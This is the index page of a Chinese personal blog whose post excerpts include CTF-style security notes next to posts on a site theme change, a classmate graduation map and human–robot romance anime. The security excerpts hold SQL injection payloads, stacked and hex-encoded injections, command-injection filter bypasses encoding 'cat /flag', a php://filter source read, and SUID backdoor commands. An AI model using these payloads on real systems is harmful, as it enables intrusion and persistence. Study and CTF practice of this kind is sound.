柏喵Sakura

  • Welcome to bs' realm.
  • Web开发起手, 正在转安全领域。
  • 真不敢说自己二次元, 但不提又感觉缺了什么。
  • bs是"BaiMeow Sakura"的缩写, 尽管这个词最初并不是其缩写。

分享一首歌

童话

January 1, 2023 · 1 min

主题更换

本来想上去看看原来的dream主题能不能做一些魔改的 但是很遗憾,dream的wiki寄了,估计作者跑路得也差不多了,还是换一个吧 现已更换为PaperMod,一个同样简洁,但是布局更美观的主题 文章几乎是无缝迁移,没有问题,毕竟都是hugo体系的 看看todo吧 备案页脚(每次换主题都要搞一次这玩意 友链页 搜索页 $\LaTeX$ 支持 bilibili,youtube 视频嵌入 cloudmusic 音乐嵌入 评论 完整版 About Me

January 1, 2023 · 1 min

SUID特殊权限提权

SUID特殊权限提权 SUID是什么 SUID是一种特殊权限,当拥有该权限的程序运行时,进程的属主不是进程的发起者而是程序的所有者。 SUID可以用来做什么 SUID是维持权限的一种手段,攻击者在临时获得权限后,可以将vim,cp等命令设置为SUID特殊权限,例如可以修改/root/.ssh/authorized_keys进行无密码登录,此外还有很多其他方式留后门。 添加SUID权限 example chmod u+s /usr/bin/vim chmod g+s /usr/bin/vim 寻找SUID权限文件 受害者错误配置的文件权限时,可以利用这些被错误配置的文件完成攻击 查找SUID、SGID文件 #Find SUID find / -perm-u=s -type f 2>/dev/null #Find GUID find / -perm-g=s -type f 2>/dev/null reference: http://cn-sec.com/archives/501443.html https://gtfobins.github.io

October 8, 2022 · 1 min · BaiMeow

php://filter

php输入输出流过滤器 references:https://www.php.net/manual/zh/wrappers.php.php

September 30, 2022 · 1 min · BaiMeow

sql注入点

UNION 先想办法结束上个语句,再用UNION拼接下一个语句 堆叠注入 同上,但用;拼接 WHERE 使其SELECT所有数据 注入: admin' – admin' # admin'/* ' or 1=1– ' or 1=1# ' or 1=1/* ‘) or ‘1’=‘1– ‘) or (‘1’=‘1– 以不同的用户登陆 ' UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1– 报错注入

September 30, 2022 · 1 min · BaiMeow

命令执行漏洞

空格绕过 ${IFS} $IFS$9 $9指传过来的第9个参数 %09(需要PHP环境) <或者<>重定向 关键字绕过 变量拼接 a=c;b=at;c=fl;d=ag;$a$b $c$d 单引号,双引号绕过 ca''t flag 编码绕过 $(printf "\154\163") ==>ls $(printf "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67") ==>cat /flag {printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|\$0 ==>cat /flag 读文件绕过(当cat被过滤) more:一页一页的显示档案内容 less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页 head:查看头几行(参数-c 10指定前10个字节) tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示 tail:查看尾几行(参数-c 10指定后10个字节) nl:显示的时候,顺便输出行号 od:以二进制的方式读取档案内容 vi/vim:一种编辑器,这个也可以查看 sort:可以查看 uniq:可以查看 file -f:报错出具体内容 反斜线 c\at $1、$2等和$@ c$1at from:https://blog....

September 22, 2022 · 1 min · BaiMeow

php审计1

include include一个php流,base64编码源码 php://filter/read=convert.base64-encode/resource=index.php

September 22, 2022 · 1 min · BaiMeow

sql注入简记

信息的获取 SELECT version() 数据库版本 user() 数据库用户名 database 数据库名 @@datadir 数据库路径 @@version_compile_os 操作系统版本 其他 show columns from table_name;列信息 show databases;所有数据库名 show tables;所有表名 注入 1' order by 2 # 检查记录数量 字符串拼接 concat(str1,str2,…) 能够将你查询的字段连接在一起 concat_ws(separator,str1,str2,) 能够自定义分隔符来将你查询的字段链接在一起 group_concat([DISTINCT] column [Order BY ASC/DESC column] [Separator separator]) Example SELECTconcat(table_name,' ',column_name)FROMinformation_schema.COLUMNSWHERETABLE_SCHEMA=DATABASE();SELECTgroup_concat(table_name,column_nameseparator'_')FROMinformation_schema.COLUMNSWHERETABLE_SCHEMA=DATABASE();关键字被过滤 简单的有: 大小写混用(seLect,whEre…) SEL<>ECT(php) 空格 -> () = -> like 但是极其容易被堵,其他方法有以下 alter移花接木(堆叠注入) alter table (add/change/drop) selectdatafromwordswhereid='1';renametablewordstowords1;renametable`1919810931114514`towords;altertablewordsadd`id`intauto_incrementprimarykey;altertablewordschangeflagdatavarchar(100);#'; reference:https://ek1ng.com/notes.html#%E6%80%9D%E8%B7%AF%E4%B8%80 Hex绕开 hex编码sql语句再执行 select * from table_name =>73656c656374202a2066726f6d207461626c655f6e616d65 注入1';SeT@a=0x73656c656374202a2066726f6d207461626c655f6e616d65;prepare execsql from @a;execute execsql;%23...

September 21, 2022 · 1 min · BaiMeow

书生中学21届毕业去向地图

前言 看到隔壁8班要整这个地图,自己还是稍微有点馋的, 别人有的,我也可以有 做什么样子的? 8班的思路是照抄一个上三届的地图 也就是这张图 作者她在github上是有开源的,所以想做一个同款只需要替换一下学生数据即可 但我对她的地图并不是特别满意,因为其定位区域太过于模糊了 我们可以看到,她把杭州的一大堆人放在一起显示,而我则希望比例尺能再放大一些 是的,我不能直接白嫖了 我希望做一个在地图上把各个学生位置比较精确地标出来的地图,而不是这样一个笼统的地图 怎么做? 有以下几个问题 学生数据从哪来? 指望学校老师去收集数据不知道要等到什么时候了,所以必须自己去收集, 因此我找了两位同学合作收集,其中一位是班长, 首先我们将朋友圈和qq空间的零散信息进行了简单的搜集, 当然这还远远不够,多数人是没有发布到这些地方的,因此要一个个去问 此时班长的身份就显得很有优势,不管去问谁的录取都不会显得非常奇怪,反而很容易被误认为是老师要求收集的 地图从哪来? 要找到现成的地图最好是找一个成熟的地图应用供应商,然后使用他的开放平台 我最终选择的是高德地图 民用而言,高德地图算是大家都比较熟悉的地图,也做的比较大 另外,高德地图开放平台的文档看起来也非常齐全,对于开发者而言能大幅度提升开发效率 怎么标点? 最初,我是想着每个学生标记一个点, 但是,如果很多学生录取到同一个学校就会导致点的重叠 这样就需要去调整各个点的偏移量,总之事情就变得麻烦了起来 不如干脆一个学校一个点标记,旁边挂一个文本框然后把学生安排进去 实现难度上,文档上明确地写着点标记的用法,因此没有什么实现难度 标点的位置从哪来? 点标记文档说是需要标点的经纬度来进行标记 经纬度从哪来?就需要用到另一个api了 下面为错误示范 我选用了逆地理编码api, 因为有各个学校的名称,他肯定是学校地址的一段内容,所以进行逆地理编码后就能获取到学校的经纬度位置 按照这个想法进行调用,结果有四五个学校的位置出现了错误 最离谱的,中国美术学院被定位到了安徽,温州理工学院被定位到了温州市政府 这可不行,于是我在学生信息收集表上另外附加了一个字段,用于描述详细地址 结果有一部分学校的位置纠正回来了,也有一部分没有纠正回来 同时被纠正位置的学校他定位在学校门口的路上而没有定位在学校内部 事态陷入了僵局。 下面为正确操作 怎么会这样呢?平时我们搜索不是一搜索一个准吗? 事实上,我用错api了 地理编码/逆地理编码 API 是通过 HTTP/HTTPS 协议访问远程服务的接口,提供结构化地址与经纬度之间的相互转化的能力。 结构化地址的定义: 首先,地址肯定是一串字符,内含国家、省份、城市、区县、城镇、乡村、街道、门牌号码、屋邨、大厦等建筑物名称。按照由大区域名称到小区域名称组合在一起的字符。一个有效的地址应该是独一无二的。注意:针对大陆、港、澳地区的地理编码转换时可以将国家信息选择性的忽略,但省、市、城镇等级别的地址构成是不能忽略的。暂时不支持返回台湾省的详细地址信息。 重新阅读文档,这个api是用于将结构化地址转换为经纬度的,而不是用于对名称进行搜索的, 结构化地址是什么?就是下面这种 北京市朝阳区阜通东大街6号 因此,我仅仅是传一个名称进去会出现一些错误也是很正常的 我应该使用的api名为关键字搜索api 替换后所有学校定位都正常了,除开多校区的学校可能定位的不是他们将要就读的校区罢了 不过,只需使用我之前走弯路的时候添加的详细地址字段便可以在不改变显示名称的情况下使其定位到特定校区 我前端水平差得很 地图是给人看的,好不好看和前端水平有关 我一直以来都是写后端的,虽然都说卷后端鬼迷心窍 我上次写前端是在写fishbot2的时候 当时戳了半天的element才戳出一个现代的框框和选项卡 因此我写了点golang将经纬度位置的获取等等操作放到了后端,生成一个json文件,用的时候调就可以了 点的标记反正文档都有,问题也不大...

July 28, 2021 · 1 min · BaiMeow

人机恋作品漫谈

前言 十个人机九个刀,还有一个刀死人 人机恋题材具有著名的超高死亡率,虽然常常以悲剧或者是完全说不上是好结局的GoodEnd收尾,让人,特别是新人完全顶不住,但是其质量也往往高于一般的作品 因此就算往往会致郁,大多也值得去一玩 关于我见过的人机恋作品 按照我了解的时间顺序举例 游戏人生Zero Games Have Begun 是游戏人生的电影,大概是小说第四卷,讲的是一对很强但是从未赢过的夫妻的故事。 很值得看看https://www.bilibili.com/bangumi/play/ss28381 女主人公休比机凯种,为了破解人类所谓的“心”来观察人类,过程中渐渐具有人类情感并与人类男子里克相恋 满溢而出的ERROR 最终因独自出门布置装置被击杀,但“心”在最后备份到了云端,里克在机凯种的帮助下结束了战争,但死于握持星杯时的反噬 这部作品和其他人机恋讲的故事不太一样,他没有专注于渲染离别的悲伤,也没讲人机恋会出现的问题,更多的是通过宏大的叙事表达一种浪漫 一种二人拯救世界的浪漫 可塑性记忆 愿你有一天能和你重要的人再度相逢 这款游戏其实我没玩过,因为他在PSV上,有点年头了也很难玩到,但是其动画化后的动画还是很容易看到的。 这是我第一次被刀到哭的作品,没看过的可以https://www.bilibili.com/bangumi/play/ep28924 我是在被剧透后观看的,不过即使我有了一定抵抗力,告别的场景也很难让人不流泪 非常经典的人机恋题材作品,从相遇到日常再到相恋到最后几经波折后的离别 艾拉从事的就是giftia(本作中的机器被称为giftia)回收工作,所以她最后也由男主角来回收 越是刻画日常生活中艾拉的可爱与两人的糖最后就越是让人难受 星之梦 若是天国有两扇门,我可不跟你走啊 星之梦严格意义上可能不能算人机恋 故事发生在人类都市废墟,星野梦美是现已废弃的天文馆中的讲解机器人,男主来废墟捡垃圾在天文馆中找到了她 男主被梦美所打动,本来是要带她离开废墟,继续传播仰望星空的那种希望 最后为男主挡伤害与没电两个原因停止工作,本作最后反复多方向渲染离别,即使我现在剧透给你听,你再去看也很催泪 推荐观看https://www.bilibili.com/bangumi/play/ep90842 另外,其实星野梦美的记忆芯片(128EB)有保留,但男主在死前,在找到其他机器人后并没有进行替换 露西 她所期望的一切 还有我所期望的一切 这部作品我到最后都没明白Lucy想要什么,推测应该是某种记忆的永恒。 但是这个男主父亲是真的过分,明明看着Lucy会哭会笑,还下得去手。 这便是人性的阴暗面吧,能体会到这种阴暗,很难讲出来到底是为什么 不过本作结局还是给了一个比较好的结局,经过男主的努力15年后Lucy回来了 ATRI-My Dear Moments- 我是高性能的嘛! 2020年的新游戏,说是年轻人的第一款galgame。我本来是冲着atri来的,做足了心理准备,但还是刀的我有点始料未及。 没玩过的就别看下面了,快去steam上买吧,不亏的 话说宣传PV都是动画,这部作品动画化怕是指日可待啊! 本作总体是从认识到相恋到告别的老故事,与上述作品不同的是其讨论了仿生人是否具有心 关于机器人时候有心的讨论让这部作品显得更为深刻,atri是明确有心的,但是没有被任何人包括自己发现 因为atri确实是机器人,atri只是做着她认为机器人该做的事情从而埋藏了自己的心 被命令不能模拟人类情感后的,无感情的那一刻让人看了简直心碎了 所以我认为作品中所谓的拯救atri就是让她发现自己的心,并遵循内心的想法来生活 atri和男主是互相拯救的关系的,atri走后男主回研究院去拯救世界了 共同点 见识过那么多优秀的人机恋类型的作品,其实他们都遵循这几个点 特有的发言风格 机器人特有的发言风格,在说话中会从自己的特殊身份出发,这与人类的日常说话方式截然不同 艾拉在假装没听见时会回复“ERROR 听不见”...

July 12, 2021 · 1 min · BaiMeow